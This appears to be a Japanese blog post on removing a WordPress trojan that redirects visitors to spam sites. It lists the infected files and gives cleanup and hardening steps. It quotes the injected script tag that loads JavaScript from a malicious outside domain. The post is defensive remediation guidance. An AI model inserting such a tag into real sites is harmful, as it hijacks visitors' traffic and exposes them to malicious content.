ホーム 経験・テクニック共有 標準記事

標準記事

WordPressがトロイの木馬ウイルスに感染した後、悪意のあるサイトにリダイレクトされる問題の解決方法

WordPressは多くの外国貿易向け独立サイトの第一選択肢であり、世界の35%のウェブサイトがWordPressを使用しています。エコシステムが充実し、プラグインやテーマも非常に豊富です。そのため、WordPressのセキュリティも重要です。今日、ある外国貿易サイトが正常にアクセスできず、サイトを開くと他のゴミサイトにリダイレクトされました。明らかにウイルスに感染し、悪意のあるリダイレクトが行われています…

2020年9月5日更新 約4分で読めます
WordPress中木马病毒后跳转到恶意网站的解决办法

WordPressは多くの外国貿易向け独立サイトの第一選択肢であり、全世界のウェブサイトの35%がWordPressを使用しています。エコシステムが成熟しており、PluginやThemeも非常に豊富です。そのため、WordPressのセキュリティも重要です。今日、ある外国貿易向けサイトが正常にアクセスできず、サイトを開くと他のスパムサイトにリダイレクトされてしまいました。明らかにウイルスに感染し、悪意のあるリダイレクトが行われています。Naibaはここに記録します。他のサイトへの悪意のあるリダイレクトを行うWordPressウイルス・トロイの木馬スクリプトをどのように駆除するか

WordPress恶意跳转

ウイルスの状態

この悪意のあるリダイレクトウイルス自体は、サイトデータに直接的な損害を与えるものではありませんが、悪意のあるスクリプトを挿入してサイトを開けなくし、サイトのトラフィックをハイジャックして他のサイトにリダイレクトし、ユーザーを騙してブラウザ通知を許可させた後、ブラウザに広告をポップアップ表示することで利益を得ます。(もしあなたがちょうど被害に遭った場合は、Windows10システム右下のChromeポップアップ広告を閉じる方法

ウイルスの原理

このウイルスの仕組みは、何らかの脆弱性を利用してサイトの一部のファイルデータ(一部のトロイの木馬はデータベースにも挿入)を改ざんし、悪意のあるスクリプトを挿入します。ユーザーがサイトにアクセスすると、スクリプトが実行され、自動的にトラフィックをハイジャックして悪意のあるサイトにリダイレクトします。

Naibaが今日遭遇したこのトロイの木馬スクリプトは、サイトに以下のスクリプトを挿入していました:

<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>

悪意のあるスクリプトは、サイト上のいくつかのファイルに挿入されています。例えば以下のファイルです(これらだけではありません):

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

Themeファイル (wp-content/themes/{themeName}/)

    • footer.php
    • header.php
    • functions.php

一部のPluginのファイルも汚染されることがあります。

駆除方法

Naibaが今日遭遇したこのトロイの木馬は、サイトファイルデータを変更しただけでなく、同時にデータベースも汚染していました。そのため、ファイルとデータベースのウイルスを同時に駆除する必要があり、サイトを正常に復元できます。

方法1:ウェブサイトのバックアップデータを使用して復元する

バックアップの習慣があれば、以前にバックアップしたサイトのデータベースとファイルを直接復元できます。これが最も迅速な解決策です。

関連記事:

方法2:手動でトロイの木馬スクリプトを削除する

バックアップがない場合は、手動でトロイの木馬スクリプトをクリーンアップする必要があるため、より面倒です。

1. ファイルマネージャー(cPanel、宝塔パネル、FTPなど)を使用してサイトのルートディレクトリにアクセスし、index.phpを開きます。ファイルの先頭に悪意のあるスクリプトが挿入されているのがわかります(下図参照)。

WordPress恶意跳转脚本

Themeファイルをチェックすると、以下のコードが挿入されているのがわかります:

WordPress恶意代码

 

2. サイト上の感染したすべてのファイルを削除します。

もちろん、すべてのファイルを一つ一つチェックして削除するのは大変な作業です。そのため、アップロードフォルダを残して、他のフォルダはすべて削除し、最新のWordPressインストールパッケージをダウンロード上書きアップロードします。

3. 安全なサイトファイルをサーバーにアップロードします。

4. データベースのバックエンドにアクセスし、汚染されたデータベースの内容をクリーンアップします。

数据库恶意脚本

上の図はデータベース内で見つかった悪意のあるスクリプトデータです。手動で削除する必要があります。

5. Wordfenceをインストールして、サイトファイルに漏れがないかスキャンします。

これで、サイト上の悪意のあるスクリプトファイルはクリーンアップされ、サイトは正常にアクセスできるようになります。

セキュリティ保護

ウイルスの除去が完了しました。再びハッキングされるのを防ぐために、WordPressのセキュリティ対策を行う必要があります。Naibaが皆さんにまとめた経験則は以下の通りです:

  1. 管理者アカウントには必ず安全なパスワードを設定し、できればWordPressが自動生成するような高強度のパスワードを使用してください。
  2. WordPressのバージョンとPluginのバージョンを最新に保ちましょう。多くの外国貿易向け独立サイトは決して更新されず、脆弱性のあるバージョンに遭遇してしまうのは避けられません。
  3. 出所不明のThemeやPluginはインストールしないでください。クラック版は安全性が保証されていない場合、インストールしないのが最善です。
  4. サーバーのセキュリティも考慮する必要があります。サーバーソフトウェアのバージョンを最新に保ち、安全なパスワードを使用してください。
  5. セキュリティPluginをインストールすることもできますが、経験上、強力なウイルスに遭遇した場合、セキュリティPluginも無力です。

したがって、最も安全な方法はパスワードを安全に保ち、プラグインやテーマをむやみにインストールせず、バージョンを常に最新に保つことです。

最後に、サイトからマルウェアがまだ除去されていない場合は、Naiba に有料で対応を依頼することもできます。

3/5 - (2票)
前の記事 WordPress 5.5.1 更新記録  34件のバグ修正と4件の機能強化 同じタイムラインの近くのコンテンツを読み続ける。 次の記事 WordPress CMS ニュース・マガジン Theme ダウンロード:Jannah News v5.0.7 次の関連チュートリアルや経験を表示する。

AIサイト構築アシスタント

🤖
こんにちは!私はNaibaサイト構築ノートのAIアシスタントです。何かお手伝いできることはありますか?
クイックコンサルティング: